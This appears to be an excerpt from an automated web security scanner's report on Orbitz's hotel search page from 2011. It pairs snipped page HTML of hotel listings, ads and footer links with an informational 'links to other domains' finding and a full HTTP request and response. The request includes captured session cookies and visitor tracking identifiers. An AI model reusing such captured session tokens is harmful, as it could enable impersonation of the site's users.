kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=1243&hotel.hkey=1243_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/243/1243/Best-Western-TLC-Hotel-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=126192&hotel.hkey=126192_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/192/126192/Homestead-Boston-Burlington-Hotel-Exterior-1-20110806-191241-564.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=46267&hotel.hkey=46267_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/267/46267/Staybridge-Suites-BOSTON-BURLINGTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=21447&hotel.hkey=21447_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/447/21447/Sheraton-Needham-Hotel-Hotel-Exterior-5.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=39858&hotel.hkey=39858_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/858/39858/TownePlace-Suites-by-Marriott-Boston-North-ShoreDanvers-Lobby-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=104806&hotel.hkey=104806_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/806/104806/Holiday-Inn-Select-BOSTON-WOBURN-Hotel-Exterior-1-20110806-190117-024.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=65326&hotel.hkey=65326_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/326/65326/Candlewood-Suites-BOSTON-BRAINTREE-Hotel-Exterior-1-20110821-191228-688.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=213157&hotel.hkey=213157_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/157/213157/InterContinental-BOSTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=5284&hotel.hkey=5284_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/284/5284/SpringHill-Suites-by-Marriott-Boston-Peabody-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=86956&hotel.hkey=86956_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/956/86956/Extended-Stay-Deluxe-Boston-Waltham-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=42996&hotel.hkey=42996_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/996/42996/Red-Roof-Inn-Boston-Woburn-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=19403&hotel.hkey=19403_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/403/19403/Holiday-Inn-BOSTON-DEDHAM-HTL-CONF-CTR-Hotel-Exterior-1-20110820-190332-771.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=2042&hotel.hkey=2042_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/042/2042/Hampton-Inn-BostonBraintree-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...
19.238. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/United_States--MA/Boston/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1297" height="58" width="160" />
    </div>
...[SNIP]...
bitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=OVI" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png" alt="" height="29" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (7)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (107)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (47)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (8)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=230082&hotel.hkey=230082_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/082/230082/The-Liberty-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10442&hotel.hkey=10442_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/442/10442/The-Charles-Hotel-Hotel-Exterior-2.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=44756&hotel.hkey=44756_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/756/44756/Sheraton-Commander-Hotel-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
